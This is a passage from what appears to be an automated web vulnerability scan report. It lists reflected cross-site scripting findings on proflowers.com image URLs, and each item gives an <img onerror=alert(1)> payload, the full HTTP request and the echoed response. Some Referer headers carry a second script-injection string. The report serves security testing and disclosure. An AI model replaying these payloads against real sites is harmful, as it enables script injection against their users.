GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThibiscus_dkbsktyel09_ldaa33<img%20src%3da%20onerror%3dalert(1)>f1e0c05c9d7?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 101
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:56 GMT
Connection: close

Unable to find /ProvideCommerce/PLThibiscus_dkbsktyel09_ldaa33<img src=a onerror=alert(1)>f1e0c05c9d7
4.135. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload bab1d<img%20src%3da%20onerror%3dalert(1)>753a0dd4198 was submitted in the REST URL parameter 9. This input was echoed as bab1d<img src=a onerror=alert(1)>753a0dd4198 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PFbab1d<img%20src%3da%20onerror%3dalert(1)>753a0dd4198?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:08 GMT
Connection: close

Unable to find /ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PFbab1d<img src=a onerror=alert(1)>753a0dd4198
4.136. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 7a739<img%20src%3da%20onerror%3dalert(1)>19e4b46ec9b was submitted in the REST URL parameter 9. This input was echoed as 7a739<img src=a onerror=alert(1)>19e4b46ec9b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF7a739<img%20src%3da%20onerror%3dalert(1)>19e4b46ec9b?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 117
Cache-Control: no-store
Date: Mon, 09 May 2011 12:11:04 GMT
Connection: close

Unable to find /ProvideCommerce/PLTluckybamboo_chinesetakeout11_PC1858_PF7a739<img src=a onerror=alert(1)>19e4b46ec9b
4.137. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload eb0f5<img%20src%3da%20onerror%3dalert(1)>e862abd4ade was submitted in the REST URL parameter 9. This input was echoed as eb0f5<img src=a onerror=alert(1)>e862abd4ade in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLUMdayBearGodiva_FCB_PFeb0f5<img%20src%3da%20onerror%3dalert(1)>e862abd4ade?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:58 GMT
Connection: close

Unable to find /ProvideCommerce/PLUMdayBearGodiva_FCB_PFeb0f5<img src=a onerror=alert(1)>e862abd4ade
4.138. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 58402<img%20src%3da%20onerror%3dalert(1)>acc34c808be was submitted in the REST URL parameter 9. This input was echoed as 58402<img src=a onerror=alert(1)>acc34c808be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS12red50_rbye11_PF58402<img%20src%3da%20onerror%3dalert(1)>acc34c808be?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:00 GMT
Connection: close

Unable to find /ProvideCommerce/ROS12red50_rbye11_PF58402<img src=a onerror=alert(1)>acc34c808be
4.139. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 40198<img%20src%3da%20onerror%3dalert(1)>c102b875793 was submitted in the REST URL parameter 9. This input was echoed as 40198<img src=a onerror=alert(1)>c102b875793 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assorted50_grn10_PF40198<img%20src%3da%20onerror%3dalert(1)>c102b875793?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 100
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assorted50_grn10_PF40198<img src=a onerror=alert(1)>c102b875793
4.140. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload b5eda<img%20src%3da%20onerror%3dalert(1)>edca8607877 was submitted in the REST URL parameter 9. This input was echoed as b5eda<img src=a onerror=alert(1)>edca8607877 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PFb5eda<img%20src%3da%20onerror%3dalert(1)>edca8607877?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 102
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:06 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assrt_pnk11_2_FVFC_PFb5eda<img src=a onerror=alert(1)>edca8607877
4.141. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload efcb0<img%20src%3da%20onerror%3dalert(1)>e1c89bf3dc5 was submitted in the REST URL parameter 9. This input was echoed as efcb0<img src=a onerror=alert(1)>e1c89bf3dc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrt_pnk11_2_PFefcb0<img%20src%3da%20onerror%3dalert(1)>e1c89bf3dc5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=120&hei=140 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 97
Cache-Control: no-store
Date: Mon, 09 May 2011 12:10:51 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assrt_pnk11_2_PFefcb0<img src=a onerror=alert(1)>e1c89bf3dc5
4.142. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dd052<img%20src%3da%20onerror%3dalert(1)>161137e8761 was submitted in the REST URL parameter 9. This input was echoed as dd052<img src=a onerror=alert(1)>161137e8761 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24assrtpet_grn10_PFdd052<img%20src%3da%20onerror%3dalert(1)>161137e8761?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:46 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24assrtpet_grn10_PFdd052<img src=a onerror=alert(1)>161137e8761
4.143. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload dd2be<img%20src%3da%20onerror%3dalert(1)>86af9b73a16 was submitted in the REST URL parameter 9. This input was echoed as dd2be<img src=a onerror=alert(1)>86af9b73a16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS24red40_rbye10_2_PFdd2be<img%20src%3da%20onerror%3dalert(1)>86af9b73a16?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 98
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:49 GMT
Connection: close

Unable to find /ProvideCommerce/ROS24red40_rbye10_2_PFdd2be<img src=a onerror=alert(1)>86af9b73a16
4.144. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload c2bf3<img%20src%3da%20onerror%3dalert(1)>1ee7bd55e21 was submitted in the REST URL parameter 9. This input was echoed as c2bf3<img src=a onerror=alert(1)>1ee7bd55e21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PFc2bf3<img%20src%3da%20onerror%3dalert(1)>1ee7bd55e21?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 111
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:01 GMT
Connection: close

Unable to find /ProvideCommerce/ROS_PAS_pinkbicolor_11pm_catalog_PFc2bf3<img src=a onerror=alert(1)>1ee7bd55e21
4.145. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 6ef1c<img%20src%3da%20onerror%3dalert(1)>f003a515b43 was submitted in the REST URL parameter 9. This input was echoed as 6ef1c<img src=a onerror=alert(1)>f003a515b43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY07_Berry24_PF6ef1c<img%20src%3da%20onerror%3dalert(1)>f003a515b43?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:12 GMT
Connection: close

Unable to find /ProvideCommerce/SHB_EDY07_Berry24_PF6ef1c<img src=a onerror=alert(1)>f003a515b43
4.146. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 4a901<img%20src%3da%20onerror%3dalert(1)>846a86c1b6f was submitted in the REST URL parameter 9. This input was echoed as 4a901<img src=a onerror=alert(1)>846a86c1b6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10106_14a901<img%20src%3da%20onerror%3dalert(1)>846a86c1b6f?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:17:11 GMT
Connection: close

Unable to find /ProvideCommerce/SHB_EDY09_BRR10106_14a901<img src=a onerror=alert(1)>846a86c1b6f
4.147. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1 [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload fc21b<img%20src%3da%20onerror%3dalert(1)>039a8b320c5 was submitted in the REST URL parameter 9. This input was echoed as fc21b<img src=a onerror=alert(1)>039a8b320c5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SHB_EDY09_BRR10112_1fc21b<img%20src%3da%20onerror%3dalert(1)>039a8b320c5?nanos=770&qlt=75,1&resMode=sharp2&op_usm=0.5,1.0,0.0,0&wid=170&hei=198 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/mothers-day-flowers-MDF?tile=hmpg_hero16c36a\%22%3balert(1)//decb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 96
Cache-Control: no-store
Date: Mon, 09 May 2011 12:16:59 GMT
Connection: close

Unable to find /ProvideCommerce/SHB_EDY09_BRR10112_1fc21b<img src=a onerror=alert(1)>039a8b320c5
4.148. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 318c3<img%20src%3da%20onerror%3dalert(1)>14ddc48f11f was submitted in the REST URL parameter 9. This input was echoed as 318c3<img src=a onerror=alert(1)>14ddc48f11f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ318c3<img%20src%3da%20onerror%3dalert(1)>14ddc48f11f?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 114
Cache-Control: no-store
Date: Mon, 09 May 2011 12:24:04 GMT
Connection: close

Unable to find /ProvideCommerce/SNK_CKGCHEESBRD_CheeseSnkBrd_GEN_10_SQ318c3<img src=a onerror=alert(1)>14ddc48f11f
4.149. http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ [REST URL parameter 9]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a1128.g.akamai.net
Path:   /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ

Issue detail

The value of REST URL parameter 9 is copied into the HTML document as plain text between tags. The payload 443e5<img%20src%3da%20onerror%3dalert(1)>94aad6f4a68 was submitted in the REST URL parameter 9. This input was echoed as 443e5<img src=a onerror=alert(1)>94aad6f4a68 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/SNK_CKNMDAYROSE_MomFrtFlwr_MDY_11_SQ443e5<img%20src%3da%20onerror%3dalert(1)>94aad6f4a68?nanos=770&qlt=75,0&resMode=sharp&op_usm=0.5,1.0,0.0,0&wid=163&hei=163 HTTP/1.1
Host: a1128.g.akamai.net
Proxy-Connection: keep-alive
Referer: http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_hero16c36a%5c%22%3balert(1)%2f%2fdecb137eb0b&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
